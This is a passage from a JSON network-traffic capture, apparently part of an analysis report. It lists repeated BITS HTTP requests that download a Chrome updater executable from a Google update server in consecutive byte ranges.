  1675.         "data": "GET /edgedl/release2/chrome/ANcTHgjx95-y_74.0.3729.169/74.0.3729.169_73.0.3683.86_chrome_updater.exe?cms_redirect=yes&mip=172.98.67.13&mm=28&mn=sn-tt1e7n7k&ms=nvh&mt=1560902783&mv=m&pl=24&shardbypass=yes HTTP/1.1\r\nConnection: Keep-Alive\r\nAccept: */*\r\nAccept-Encoding: identity\r\nIf-Unmodified-Since: Tue, 21 May 2019 04:56:27 GMT\r\nRange: bytes=0-7097\r\nUser-Agent: Microsoft BITS/7.5\r\nX-Old-UID: cnt=0\r\nX-Last-HR: 0x0\r\nX-Last-HTTP-Status-Code: 0\r\nX-Retry-Count: 0\r\nX-HTTP-Attempts: 1\r\nHost: r4---sn-tt1e7n7k.gvt1.com\r\n\r\n",
  1676.         "port": 80
  1677.     },
  1678.     {
  1679.         "count": 1,
  1680.         "body": "",
  1681.         "uri": "http://r4---sn-tt1e7n7k.gvt1.com/edgedl/release2/chrome/ANcTHgjx95-y_74.0.3729.169/74.0.3729.169_73.0.3683.86_chrome_updater.exe?cms_redirect=yes&mip=172.98.67.13&mm=28&mn=sn-tt1e7n7k&ms=nvh&mt=1560902783&mv=m&pl=24&shardbypass=yes",
  1682.         "user-agent": "Microsoft BITS/7.5",
  1683.         "method": "GET",
  1684.         "host": "r4---sn-tt1e7n7k.gvt1.com",
  1685.         "version": "1.1",
  1686.         "path": "/edgedl/release2/chrome/ANcTHgjx95-y_74.0.3729.169/74.0.3729.169_73.0.3683.86_chrome_updater.exe?cms_redirect=yes&mip=172.98.67.13&mm=28&mn=sn-tt1e7n7k&ms=nvh&mt=1560902783&mv=m&pl=24&shardbypass=yes",
  1687.         "data": "GET /edgedl/release2/chrome/ANcTHgjx95-y_74.0.3729.169/74.0.3729.169_73.0.3683.86_chrome_updater.exe?cms_redirect=yes&mip=172.98.67.13&mm=28&mn=sn-tt1e7n7k&ms=nvh&mt=1560902783&mv=m&pl=24&shardbypass=yes HTTP/1.1\r\nConnection: Keep-Alive\r\nAccept: */*\r\nAccept-Encoding: identity\r\nIf-Unmodified-Since: Tue, 21 May 2019 04:56:27 GMT\r\nRange: bytes=7098-17270\r\nUser-Agent: Microsoft BITS/7.5\r\nX-Old-UID: cnt=0\r\nX-Last-HR: 0x0\r\nX-Last-HTTP-Status-Code: 0\r\nX-Retry-Count: 0\r\nX-HTTP-Attempts: 1\r\nHost: r4---sn-tt1e7n7k.gvt1.com\r\n\r\n",
  1688.         "port": 80
  1689.     },
  1690.     {
  1691.         "count": 1,
  1692.         "body": "",
  1693.         "uri": "http://r4---sn-tt1e7n7k.gvt1.com/edgedl/release2/chrome/ANcTHgjx95-y_74.0.3729.169/74.0.3729.169_73.0.3683.86_chrome_updater.exe?cms_redirect=yes&mip=172.98.67.13&mm=28&mn=sn-tt1e7n7k&ms=nvh&mt=1560902783&mv=m&pl=24&shardbypass=yes",
  1694.         "user-agent": "Microsoft BITS/7.5",
  1695.         "method": "GET",
  1696.         "host": "r4---sn-tt1e7n7k.gvt1.com",
  1697.         "version": "1.1",
  1698.         "path": "/edgedl/release2/chrome/ANcTHgjx95-y_74.0.3729.169/74.0.3729.169_73.0.3683.86_chrome_updater.exe?cms_redirect=yes&mip=172.98.67.13&mm=28&mn=sn-tt1e7n7k&ms=nvh&mt=1560902783&mv=m&pl=24&shardbypass=yes",
  1699.         "data": "GET /edgedl/release2/chrome/ANcTHgjx95-y_74.0.3729.169/74.0.3729.169_73.0.3683.86_chrome_updater.exe?cms_redirect=yes&mip=172.98.67.13&mm=28&mn=sn-tt1e7n7k&ms=nvh&mt=1560902783&mv=m&pl=24&shardbypass=yes HTTP/1.1\r\nConnection: Keep-Alive\r\nAccept: */*\r\nAccept-Encoding: identity\r\nIf-Unmodified-Since: Tue, 21 May 2019 04:56:27 GMT\r\nRange: bytes=17271-26918\r\nUser-Agent: Microsoft BITS/7.5\r\nX-Old-UID: cnt=0\r\nX-Last-HR: 0x0\r\nX-Last-HTTP-Status-Code: 0\r\nX-Retry-Count: 0\r\nX-HTTP-Attempts: 1\r\nHost: r4---sn-tt1e7n7k.gvt1.com\r\n\r\n",
  1700.         "port": 80
  1701.     },
  1702.     {
  1703.         "count": 1,
  1704.         "body": "",
  1705.         "uri": "http://r4---sn-tt1e7n7k.gvt1.com/edgedl/release2/chrome/ANcTHgjx95-y_74.0.3729.169/74.0.3729.169_73.0.3683.86_chrome_updater.exe?cms_redirect=yes&mip=172.98.67.13&mm=28&mn=sn-tt1e7n7k&ms=nvh&mt=1560902783&mv=m&pl=24&shardbypass=yes",
  1706.         "user-agent": "Microsoft BITS/7.5",
  1707.         "method": "GET",
  1708.         "host": "r4---sn-tt1e7n7k.gvt1.com",
  1709.         "version": "1.1",
  1710.         "path": "/edgedl/release2/chrome/ANcTHgjx95-y_74.0.3729.169/74.0.3729.169_73.0.3683.86_chrome_updater.exe?cms_redirect=yes&mip=172.98.67.13&mm=28&mn=sn-tt1e7n7k&ms=nvh&mt=1560902783&mv=m&pl=24&shardbypass=yes",
  1711.         "data": "GET /edgedl/release2/chrome/ANcTHgjx95-y_74.0.3729.169/74.0.3729.169_73.0.3683.86_chrome_updater.exe?cms_redirect=yes&mip=172.98.67.13&mm=28&mn=sn-tt1e7n7k&ms=nvh&mt=1560902783&mv=m&pl=24&shardbypass=yes HTTP/1.1\r\nConnection: Keep-Alive\r\nAccept: */*\r\nAccept-Encoding: identity\r\nIf-Unmodified-Since: Tue, 21 May 2019 04:56:27 GMT\r\nRange: bytes=26919-43880\r\nUser-Agent: Microsoft BITS/7.5\r\nX-Old-UID: cnt=0\r\nX-Last-HR: 0x0\r\nX-Last-HTTP-Status-Code: 0\r\nX-Retry-Count: 0\r\nX-HTTP-Attempts: 1\r\nHost: r4---sn-tt1e7n7k.gvt1.com\r\n\r\n",
  1712.         "port": 80
  1713.     },
  1714.     {
  1715.         "count": 1,
  1716.         "body": "",
  1717.         "uri": "http://r4---sn-tt1e7n7k.gvt1.com/edgedl/release2/chrome/ANcTHgjx95-y_74.0.3729.169/74.0.3729.169_73.0.3683.86_chrome_updater.exe?cms_redirect=yes&mip=172.98.67.13&mm=28&mn=sn-tt1e7n7k&ms=nvh&mt=1560902783&mv=m&pl=24&shardbypass=yes",
  1718.         "user-agent": "Microsoft BITS/7.5",
  1719.         "method": "GET",
  1720.         "host": "r4---sn-tt1e7n7k.gvt1.com",
  1721.         "version": "1.1",
  1722.         "path": "/edgedl/release2/chrome/ANcTHgjx95-y_74.0.3729.169/74.0.3729.169_73.0.3683.86_chrome_updater.exe?cms_redirect=yes&mip=172.98.67.13&mm=28&mn=sn-tt1e7n7k&ms=nvh&mt=1560902783&mv=m&pl=24&shardbypass=yes",
  1723.         "data": "GET /edgedl/release2/chrome/ANcTHgjx95-y_74.0.3729.169/74.0.3729.169_73.0.3683.86_chrome_updater.exe?cms_redirect=yes&mip=172.98.67.13&mm=28&mn=sn-tt1e7n7k&ms=nvh&mt=1560902783&mv=m&pl=24&shardbypass=yes HTTP/1.1\r\nConnection: Keep-Alive\r\nAccept: */*\r\nAccept-Encoding: identity\r\nIf-Unmodified-Since: Tue, 21 May 2019 04:56:27 GMT\r\nRange: bytes=43881-57938\r\nUser-Agent: Microsoft BITS/7.5\r\nX-Old-UID: cnt=0\r\nX-Last-HR: 0x0\r\nX-Last-HTTP-Status-Code: 0\r\nX-Retry-Count: 0\r\nX-HTTP-Attempts: 1\r\nHost: r4---sn-tt1e7n7k.gvt1.com\r\n\r\n",
  1724.         "port": 80
  1725.     },
  1726.     {
  1727.         "count": 1,
  1728.         "body": "",
  1729.         "uri": "http://r4---sn-tt1e7n7k.gvt1.com/edgedl/release2/chrome/ANcTHgjx95-y_74.0.3729.169/74.0.3729.169_73.0.3683.86_chrome_updater.exe?cms_redirect=yes&mip=172.98.67.13&mm=28&mn=sn-tt1e7n7k&ms=nvh&mt=1560902783&mv=m&pl=24&shardbypass=yes",
  1730.         "user-agent": "Microsoft BITS/7.5",
  1731.         "method": "GET",
  1732.         "host": "r4---sn-tt1e7n7k.gvt1.com",
  1733.         "version": "1.1",
  1734.         "path": "/edgedl/release2/chrome/ANcTHgjx95-y_74.0.3729.169/74.0.3729.169_73.0.3683.86_chrome_updater.exe?cms_redirect=yes&mip=172.98.67.13&mm=28&mn=sn-tt1e7n7k&ms=nvh&mt=1560902783&mv=m&pl=24&shardbypass=yes",
  1735.         "data": "GET /edgedl/release2/chrome/ANcTHgjx95-y_74.0.3729.169/74.0.3729.169_73.0.3683.86_chrome_updater.exe?cms_redirect=yes&mip=172.98.67.13&mm=28&mn=sn-tt1e7n7k&ms=nvh&mt=1560902783&mv=m&pl=24&shardbypass=yes HTTP/1.1\r\nConnection: Keep-Alive\r\nAccept: */*\r\nAccept-Encoding: identity\r\nIf-Unmodified-Since: Tue, 21 May 2019 04:56:27 GMT\r\nRange: bytes=57939-87778\r\nUser-Agent: Microsoft BITS/7.5\r\nX-Old-UID: cnt=0\r\nX-Last-HR: 0x0\r\nX-Last-HTTP-Status-Code: 0\r\nX-Retry-Count: 0\r\nX-HTTP-Attempts: 1\r\nHost: r4---sn-tt1e7n7k.gvt1.com\r\n\r\n",
  1736.         "port": 80
  1737.     },
  1738.     {
  1739.         "count": 1,
  1740.         "body": "",
  1741.         "uri": "http://r4---sn-tt1e7n7k.gvt1.com/edgedl/release2/chrome/ANcTHgjx95-y_74.0.3729.169/74.0.3729.169_73.0.3683.86_chrome_updater.exe?cms_redirect=yes&mip=172.98.67.13&mm=28&mn=sn-tt1e7n7k&ms=nvh&mt=1560902783&mv=m&pl=24&shardbypass=yes",
  1742.         "user-agent": "Microsoft BITS/7.5",
  1743.         "method": "GET",
  1744.         "host": "r4---sn-tt1e7n7k.gvt1.com",
  1745.         "version": "1.1",
  1746.         "path": "/edgedl/release2/chrome/ANcTHgjx95-y_74.0.3729.169/74.0.3729.169_73.0.3683.86_chrome_updater.exe?cms_redirect=yes&mip=172.98.67.13&mm=28&mn=sn-tt1e7n7k&ms=nvh&mt=1560902783&mv=m&pl=24&shardbypass=yes",
  1747.         "data": "GET /edgedl/release2/chrome/ANcTHgjx95-y_74.0.3729.169/74.0.3729.169_73.0.3683.86_chrome_updater.exe?cms_redirect=yes&mip=172.98.67.13&mm=28&mn=sn-tt1e7n7k&ms=nvh&mt=1560902783&mv=m&pl=24&shardbypass=yes HTTP/1.1\r\nConnection: Keep-Alive\r\nAccept: */*\r\nAccept-Encoding: identity\r\nIf-Unmodified-Since: Tue, 21 May 2019 04:56:27 GMT\r\nRange: bytes=87779-155901\r\nUser-Agent: Microsoft BITS/7.5\r\nX-Old-UID: cnt=0\r\nX-Last-HR: 0x0\r\nX-Last-HTTP-Status-Code: 0\r\nX-Retry-Count: 0\r\nX-HTTP-Attempts: 1\r\nHost: r4---sn-tt1e7n7k.gvt1.com\r\n\r\n",
  1748.         "port": 80
  1749.     },
  1750.     {
  1751.         "count": 1,
  1752.         "body": "",
  1753.         "uri": "http://r4---sn-tt1e7n7k.gvt1.com/edgedl/release2/chrome/ANcTHgjx95-y_74.0.3729.169/74.0.3729.169_73.0.3683.86_chrome_updater.exe?cms_redirect=yes&mip=172.98.67.13&mm=28&mn=sn-tt1e7n7k&ms=nvh&mt=1560902783&mv=m&pl=24&shardbypass=yes",
  1754.         "user-agent": "Microsoft BITS/7.5",
  1755.         "method": "GET",
  1756.         "host": "r4---sn-tt1e7n7k.gvt1.com",
  1757.         "version": "1.1",
  1758.         "path": "/edgedl/release2/chrome/ANcTHgjx95-y_74.0.3729.169/74.0.3729.169_73.0.3683.86_chrome_updater.exe?cms_redirect=yes&mip=172.98.67.13&mm=28&mn=sn-tt1e7n7k&ms=nvh&mt=1560902783&mv=m&pl=24&shardbypass=yes",
  1759.         "data": "GET /edgedl/release2/chrome/ANcTHgjx95-y_74.0.3729.169/74.0.3729.169_73.0.3683.86_chrome_updater.exe?cms_redirect=yes&mip=172.98.67.13&mm=28&mn=sn-tt1e7n7k&ms=nvh&mt=1560902783&mv=m&pl=24&shardbypass=yes HTTP/1.1\r\nConnection: Keep-Alive\r\nAccept: */*\r\nAccept-Encoding: identity\r\nIf-Unmodified-Since: Tue, 21 May 2019 04:56:27 GMT\r\nRange: bytes=155902-236946\r\nUser-Agent: Microsoft BITS/7.5\r\nX-Old-UID: cnt=0\r\nX-Last-HR: 0x0\r\nX-Last-HTTP-Status-Code: 0\r\nX-Retry-Count: 0\r\nX-HTTP-Attempts: 1\r\nHost: r4---sn-tt1e7n7k.gvt1.com\r\n\r\n",
  1760.         "port": 80
  1761.     },
  1762.     {
  1763.         "count": 1,
  1764.         "body": "",
  1765.         "uri": "http://r4---sn-tt1e7n7k.gvt1.com/edgedl/release2/chrome/ANcTHgjx95-y_74.0.3729.169/74.0.3729.169_73.0.3683.86_chrome_updater.exe?cms_redirect=yes&mip=172.98.67.13&mm=28&mn=sn-tt1e7n7k&ms=nvh&mt=1560902783&mv=m&pl=24&shardbypass=yes",
  1766.         "user-agent": "Microsoft BITS/7.5",
  1767.         "method": "GET",
  1768.         "host": "r4---sn-tt1e7n7k.gvt1.com",
  1769.         "version": "1.1",
  1770.         "path": "/edgedl/release2/chrome/ANcTHgjx95-y_74.0.3729.169/74.0.3729.169_73.0.3683.86_chrome_updater.exe?cms_redirect=yes&mip=172.98.67.13&mm=28&mn=sn-tt1e7n7k&ms=nvh&mt=1560902783&mv=m&pl=24&shardbypass=yes",
  1771.         "data": "GET /edgedl/release2/chrome/ANcTHgjx95-y_74.0.3729.169/74.0.3729.169_73.0.3683.86_chrome_updater.exe?cms_redirect=yes&mip=172.98.67.13&mm=28&mn=sn-tt1e7n7k&ms=nvh&mt=1560902783&mv=m&pl=24&shardbypass=yes HTTP/1.1\r\nConnection: Keep-Alive\r\nAccept: */*\r\nAccept-Encoding: identity\r\nIf-Unmodified-Since: Tue, 21 May 2019 04:56:27 GMT\r\nRange: bytes=236947-347303\r\nUser-Agent: Microsoft BITS/7.5\r\nX-Old-UID: cnt=0\r\nX-Last-HR: 0x0\r\nX-Last-HTTP-Status-Code: 0\r\nX-Retry-Count: 0\r\nX-HTTP-Attempts: 1\r\nHost: r4---sn-tt1e7n7k.gvt1.com\r\n\r\n",
  1772.         "port": 80
  1773.     },
  1774.     {
  1775.         "count": 1,
  1776.         "body": "",
  1777.         "uri": "http://r4---sn-tt1e7n7k.gvt1.com/edgedl/release2/chrome/ANcTHgjx95-y_74.0.3729.169/74.0.3729.169_73.0.3683.86_chrome_updater.exe?cms_redirect=yes&mip=172.98.67.13&mm=28&mn=sn-tt1e7n7k&ms=nvh&mt=1560902783&mv=m&pl=24&shardbypass=yes",
  1778.         "user-agent": "Microsoft BITS/7.5",
  1779.         "method": "GET",
  1780.         "host": "r4---sn-tt1e7n7k.gvt1.com",
  1781.         "version": "1.1",
  1782.         "path": "/edgedl/release2/chrome/ANcTHgjx95-y_74.0.3729.169/74.0.3729.169_73.0.3683.86_chrome_updater.exe?cms_redirect=yes&mip=172.98.67.13&mm=28&mn=sn-tt1e7n7k&ms=nvh&mt=1560902783&mv=m&pl=24&shardbypass=yes",
  1783.         "data": "GET /edgedl/release2/chrome/ANcTHgjx95-y_74.0.3729.169/74.0.3729.169_73.0.3683.86_chrome_updater.exe?cms_redirect=yes&mip=172.98.67.13&mm=28&mn=sn-tt1e7n7k&ms=nvh&mt=1560902783&mv=m&pl=24&shardbypass=yes HTTP/1.1\r\nConnection: Keep-Alive\r\nAccept: */*\r\nAccept-Encoding: identity\r\nIf-Unmodified-Since: Tue, 21 May 2019 04:56:27 GMT\r\nRange: bytes=347304-526212\r\nUser-Agent: Microsoft BITS/7.5\r\nX-Old-UID: cnt=0\r\nX-Last-HR: 0x0\r\nX-Last-HTTP-Status-Code: 0\r\nX-Retry-Count: 0\r\nX-HTTP-Attempts: 1\r\nHost: r4---sn-tt1e7n7k.gvt1.com\r\n\r\n",
  1784.         "port": 80
  1785.     },
  1786.     {
  1787.         "count": 1,
  1788.         "body": "",
  1789.         "uri": "http://r4---sn-tt1e7n7k.gvt1.com/edgedl/release2/chrome/ANcTHgjx95-y_74.0.3729.169/74.0.3729.169_73.0.3683.86_chrome_updater.exe?cms_redirect=yes&mip=172.98.67.13&mm=28&mn=sn-tt1e7n7k&ms=nvh&mt=1560902783&mv=m&pl=24&shardbypass=yes",
  1790.         "user-agent": "Microsoft BITS/7.5",
  1791.         "method": "GET",
  1792.         "host": "r4---sn-tt1e7n7k.gvt1.com",
  1793.         "version": "1.1",
  1794.         "path": "/edgedl/release2/chrome/ANcTHgjx95-y_74.0.3729.169/74.0.3729.169_73.0.3683.86_chrome_updater.exe?cms_redirect=yes&mip=172.98.67.13&mm=28&mn=sn-tt1e7n7k&ms=nvh&mt=1560902783&mv=m&pl=24&shardbypass=yes",
  1795.         "data": "GET /edgedl/release2/chrome/ANcTHgjx95-y_74.0.3729.169/74.0.3729.169_73.0.3683.86_chrome_updater.exe?cms_redirect=yes&mip=172.98.67.13&mm=28&mn=sn-tt1e7n7k&ms=nvh&mt=1560902783&mv=m&pl=24&shardbypass=yes HTTP/1.1\r\nConnection: Keep-Alive\r\nAccept: */*\r\nAccept-Encoding: identity\r\nIf-Unmodified-Since: Tue, 21 May 2019 04:56:27 GMT\r\nRange: bytes=526213-762053\r\nUser-Agent: Microsoft BITS/7.5\r\nX-Old-UID: cnt=0\r\nX-Last-HR: 0x0\r\nX-Last-HTTP-Status-Code: 0\r\nX-Retry-Count: 0\r\nX-HTTP-Attempts: 1\r\nHost: r4---sn-tt1e7n7k.gvt1.com\r\n\r\n",
  1796.         "port": 80
  1797.     },
  1798.     {
  1799.         "count": 1,
  1800.         "body": "",
  1801.         "uri": "http://r4---sn-tt1e7n7k.gvt1.com/edgedl/release2/chrome/ANcTHgjx95-y_74.0.3729.169/74.0.3729.169_73.0.3683.86_chrome_updater.exe?cms_redirect=yes&mip=172.98.67.13&mm=28&mn=sn-tt1e7n7k&ms=nvh&mt=1560902783&mv=m&pl=24&shardbypass=yes",
  1802.         "user-agent": "Microsoft BITS/7.5",
  1803.         "method": "GET",
  1804.         "host": "r4---sn-tt1e7n7k.gvt1.com",
  1805.         "version": "1.1",
  1806.         "path": "/edgedl/release2/chrome/ANcTHgjx95-y_74.0.3729.169/74.0.3729.169_73.0.3683.86_chrome_updater.exe?cms_redirect=yes&mip=172.98.67.13&mm=28&mn=sn-tt1e7n7k&ms=nvh&mt=1560902783&mv=m&pl=24&shardbypass=yes",
  1807.         "data": "GET /edgedl/release2/chrome/ANcTHgjx95-y_74.0.3729.169/74.0.3729.169_73.0.3683.86_chrome_updater.exe?cms_redirect=yes&mip=172.98.67.13&mm=28&mn=sn-tt1e7n7k&ms=nvh&mt=1560902783&mv=m&pl=24&shardbypass=yes HTTP/1.1\r\nConnection: Keep-Alive\r\nAccept: */*\r\nAccept-Encoding: identity\r\nIf-Unmodified-Since: Tue, 21 May 2019 04:56:27 GMT\r\nRange: bytes=762054-1084391\r\nUser-Agent: Microsoft BITS/7.5\r\nX-Old-UID: cnt=0\r\nX-Last-HR: 0x0\r\nX-Last-HTTP-Status-Code: 0\r\nX-Retry-Count: 0\r\nX-HTTP-Attempts: 1\r\nHost: r4---sn-tt1e7n7k.gvt1.com\r\n\r\n",
  1808.         "port": 80
  1809.     },
  1810.     {
  1811.         "count": 1,
  1812.         "body": "",
  1813.         "uri": "http://r4---sn-tt1e7n7k.gvt1.com/edgedl/release2/chrome/ANcTHgjx95-y_74.0.3729.169/74.0.3729.169_73.0.3683.86_chrome_updater.exe?cms_redirect=yes&mip=172.98.67.13&mm=28&mn=sn-tt1e7n7k&ms=nvh&mt=1560902783&mv=m&pl=24&shardbypass=yes",
  1814.         "user-agent": "Microsoft BITS/7.5",
  1815.         "method": "GET",
  1816.         "host": "r4---sn-tt1e7n7k.gvt1.com",
  1817.         "version": "1.1",
  1818.         "path": "/edgedl/release2/chrome/ANcTHgjx95-y_74.0.3729.169/74.0.3729.169_73.0.3683.86_chrome_updater.exe?cms_redirect=yes&mip=172.98.67.13&mm=28&mn=sn-tt1e7n7k&ms=nvh&mt=1560902783&mv=m&pl=24&shardbypass=yes",
  1819.         "data": "GET /edgedl/release2/chrome/ANcTHgjx95-y_74.0.3729.169/74.0.3729.169_73.0.3683.86_chrome_updater.exe?cms_redirect=yes&mip=172.98.67.13&mm=28&mn=sn-tt1e7n7k&ms=nvh&mt=1560902783&mv=m&pl=24&shardbypass=yes HTTP/1.1\r\nConnection: Keep-Alive\r\nAccept: */*\r\nAccept-Encoding: identity\r\nIf-Unmodified-Since: Tue, 21 May 2019 04:56:27 GMT\r\nRange: bytes=1084392-1524416\r\nUser-Agent: Microsoft BITS/7.5\r\nX-Old-UID: cnt=0\r\nX-Last-HR: 0x0\r\nX-Last-HTTP-Status-Code: 0\r\nX-Retry-Count: 0\r\nX-HTTP-Attempts: 1\r\nHost: r4---sn-tt1e7n7k.gvt1.com\r\n\r\n",
  1820.         "port": 80
  1821.     },
  1822.     {
  1823.         "count": 1,
  1824.         "body": "",
  1825.         "uri": "http://r4---sn-tt1e7n7k.gvt1.com/edgedl/release2/chrome/ANcTHgjx95-y_74.0.3729.169/74.0.3729.169_73.0.3683.86_chrome_updater.exe?cms_redirect=yes&mip=172.98.67.13&mm=28&mn=sn-tt1e7n7k&ms=nvh&mt=1560902783&mv=m&pl=24&shardbypass=yes",
  1826.         "user-agent": "Microsoft BITS/7.5",
  1827.         "method": "GET",
  1828.         "host": "r4---sn-tt1e7n7k.gvt1.com",
  1829.         "version": "1.1",
  1830.         "path": "/edgedl/release2/chrome/ANcTHgjx95-y_74.0.3729.169/74.0.3729.169_73.0.3683.86_chrome_updater.exe?cms_redirect=yes&mip=172.98.67.13&mm=28&mn=sn-tt1e7n7k&ms=nvh&mt=1560902783&mv=m&pl=24&shardbypass=yes",
  1831.         "data": "GET /edgedl/release2/chrome/ANcTHgjx95-y_74.0.3729.169/74.0.3729.169_73.0.3683.86_chrome_updater.exe?cms_redirect=yes&mip=172.98.67.13&mm=28&mn=sn-tt1e7n7k&ms=nvh&mt=1560902783&mv=m&pl=24&shardbypass=yes HTTP/1.1\r\nConnection: Keep-Alive\r\nAccept: */*\r\nAccept-Encoding: identity\r\nIf-Unmodified-Since: Tue, 21 May 2019 04:56:27 GMT\r\nRange: bytes=1524417-2111791\r\nUser-Agent: Microsoft BITS/7.5\r\nX-Old-UID: cnt=0\r\nX-Last-HR: 0x0\r\nX-Last-HTTP-Status-Code: 0\r\nX-Retry-Count: 0\r\nX-HTTP-Attempts: 1\r\nHost: r4---sn-tt1e7n7k.gvt1.com\r\n\r\n",
  1832.         "port": 80
  1833.     },
  1834.     {
  1835.         "count": 1,
  1836.         "body": "",
  1837.         "uri": "http://r4---sn-tt1e7n7k.gvt1.com/edgedl/release2/chrome/ANcTHgjx95-y_74.0.3729.169/74.0.3729.169_73.0.3683.86_chrome_updater.exe?cms_redirect=yes&mip=172.98.67.13&mm=28&mn=sn-tt1e7n7k&ms=nvh&mt=1560902783&mv=m&pl=24&shardbypass=yes",
  1838.         "user-agent": "Microsoft BITS/7.5",
  1839.         "method": "GET",
  1840.         "host": "r4---sn-tt1e7n7k.gvt1.com",
  1841.         "version": "1.1",
  1842.         "path": "/edgedl/release2/chrome/ANcTHgjx95-y_74.0.3729.169/74.0.3729.169_73.0.3683.86_chrome_updater.exe?cms_redirect=yes&mip=172.98.67.13&mm=28&mn=sn-tt1e7n7k&ms=nvh&mt=1560902783&mv=m&pl=24&shardbypass=yes",
  1843.         "data": "GET /edgedl/release2/chrome/ANcTHgjx95-y_74.0.3729.169/74.0.3729.169_73.0.3683.86_chrome_updater.exe?cms_redirect=yes&mip=172.98.67.13&mm=28&mn=sn-tt1e7n7k&ms=nvh&mt=1560902783&mv=m&pl=24&shardbypass=yes HTTP/1.1\r\nConnection: Keep-Alive\r\nAccept: */*\r\nAccept-Encoding: identity\r\nIf-Unmodified-Since: Tue, 21 May 2019 04:56:27 GMT\r\nRange: bytes=2111792-3029084\r\nUser-Agent: Microsoft BITS/7.5\r\nX-Old-UID: cnt=0\r\nX-Last-HR: 0x0\r\nX-Last-HTTP-Status-Code: 0\r\nX-Retry-Count: 0\r\nX-HTTP-Attempts: 1\r\nHost: r4---sn-tt1e7n7k.gvt1.com\r\n\r\n",
  1844.         "port": 80
  1845.     },
  1846.     {
  1847.         "count": 1,
  1848.         "body": "",
  1849.         "uri": "http://r4---sn-tt1e7n7k.gvt1.com/edgedl/release2/chrome/ANcTHgjx95-y_74.0.3729.169/74.0.3729.169_73.0.3683.86_chrome_updater.exe?cms_redirect=yes&mip=172.98.67.13&mm=28&mn=sn-tt1e7n7k&ms=nvh&mt=1560902783&mv=m&pl=24&shardbypass=yes",
  1850.         "user-agent": "Microsoft BITS/7.5",
  1851.         "method": "GET",
  1852.         "host": "r4---sn-tt1e7n7k.gvt1.com",
  1853.         "version": "1.1",
  1854.         "path": "/edgedl/release2/chrome/ANcTHgjx95-y_74.0.3729.169/74.0.3729.169_73.0.3683.86_chrome_updater.exe?cms_redirect=yes&mip=172.98.67.13&mm=28&mn=sn-tt1e7n7k&ms=nvh&mt=1560902783&mv=m&pl=24&shardbypass=yes",
  1855.         "data": "GET /edgedl/release2/chrome/ANcTHgjx95-y_74.0.3729.169/74.0.3729.169_73.0.3683.86_chrome_updater.exe?cms_redirect=yes&mip=172.98.67.13&mm=28&mn=sn-tt1e7n7k&ms=nvh&mt=1560902783&mv=m&pl=24&shardbypass=yes HTTP/1.1\r\nConnection: Keep-Alive\r\nAccept: */*\r\nAccept-Encoding: identity\r\nIf-Unmodified-Since: Tue, 21 May 2019 04:56:27 GMT\r\nRange: bytes=3029085-3906922\r\nUser-Agent: Microsoft BITS/7.5\r\nX-Old-UID: cnt=0\r\nX-Last-HR: 0x0\r\nX-Last-HTTP-Status-Code: 0\r\nX-Retry-Count: 0\r\nX-HTTP-Attempts: 1\r\nHost: r4---sn-tt1e7n7k.gvt1.com\r\n\r\n",
  1856.         "port": 80
  1857.     },
  1858.     {
  1859.         "count": 1,
  1860.         "body": "",
  1861.         "uri": "http://r4---sn-tt1e7n7k.gvt1.com/edgedl/release2/chrome/ANcTHgjx95-y_74.0.3729.169/74.0.3729.169_73.0.3683.86_chrome_updater.exe?cms_redirect=yes&mip=172.98.67.13&mm=28&mn=sn-tt1e7n7k&ms=nvh&mt=1560902783&mv=m&pl=24&shardbypass=yes",
  1862.         "user-agent": "Microsoft BITS/7.5",
  1863.         "method": "GET",
  1864.         "host": "r4---sn-tt1e7n7k.gvt1.com",
  1865.         "version": "1.1",
  1866.         "path": "/edgedl/release2/chrome/ANcTHgjx95-y_74.0.3729.169/74.0.3729.169_73.0.3683.86_chrome_updater.exe?cms_redirect=yes&mip=172.98.67.13&mm=28&mn=sn-tt1e7n7k&ms=nvh&mt=1560902783&mv=m&pl=24&shardbypass=yes",
  1867.         "data": "GET /edgedl/release2/chrome/ANcTHgjx95-y_74.0.3729.169/74.0.3729.169_73.0.3683.86_chrome_updater.exe?cms_redirect=yes&mip=172.98.67.13&mm=28&mn=sn-tt1e7n7k&ms=nvh&mt=1560902783&mv=m&pl=24&shardbypass=yes HTTP/1.1\r\nConnection: Keep-Alive\r\nAccept: */*\r\nAccept-Encoding: identity\r\nIf-Unmodified-Since: Tue, 21 May 2019 04:56:27 GMT\r\nRange: bytes=3906923-4919295\r\nUser-Agent: Microsoft BITS/7.5\r\nX-Old-UID: cnt=0\r\nX-Last-HR: 0x0\r\nX-Last-HTTP-Status-Code: 0\r\nX-Retry-Count: 0\r\nX-HTTP-Attempts: 1\r\nHost: r4---sn-tt1e7n7k.gvt1.com\r\n\r\n",
  1868.         "port": 80
  1869.     },
  1870.     {
  1871.         "count": 1,
  1872.         "body": "",
  1873.         "uri": "http://r4---sn-tt1e7n7k.gvt1.com/edgedl/release2/chrome/ANcTHgjx95-y_74.0.3729.169/74.0.3729.169_73.0.3683.86_chrome_updater.exe?cms_redirect=yes&mip=172.98.67.13&mm=28&mn=sn-tt1e7n7k&ms=nvh&mt=1560902783&mv=m&pl=24&shardbypass=yes",
  1874.         "user-agent": "Microsoft BITS/7.5",
  1875.         "method": "GET",
  1876.         "host": "r4---sn-tt1e7n7k.gvt1.com",
  1877.         "version": "1.1",
  1878.         "path": "/edgedl/release2/chrome/ANcTHgjx95-y_74.0.3729.169/74.0.3729.169_73.0.3683.86_chrome_updater.exe?cms_redirect=yes&mip=172.98.67.13&mm=28&mn=sn-tt1e7n7k&ms=nvh&mt=1560902783&mv=m&pl=24&shardbypass=yes",
  1879.         "data": "GET /edgedl/release2/chrome/ANcTHgjx95-y_74.0.3729.169/74.0.3729.169_73.0.3683.86_chrome_updater.exe?cms_redirect=yes&mip=172.98.67.13&mm=28&mn=sn-tt1e7n7k&ms=nvh&mt=1560902783&mv=m&pl=24&shardbypass=yes HTTP/1.1\r\nConnection: Keep-Alive\r\nAccept: */*\r\nAccept-Encoding: identity\r\nIf-Unmodified-Since: Tue, 21 May 2019 04:56:27 GMT\r\nRange: bytes=4919296-6073348\r\nUser-Agent: Microsoft BITS/7.5\r\nX-Old-UID: cnt=0\r\nX-Last-HR: 0x0\r\nX-Last-HTTP-Status-Code: 0\r\nX-Retry-Count: 0\r\nX-HTTP-Attempts: 1\r\nHost: r4---sn-tt1e7n7k.gvt1.com\r\n\r\n",
  1880.         "port": 80
  1881.     },
  1882.     {
  1883.         "count": 1,
  1884.         "body": "",
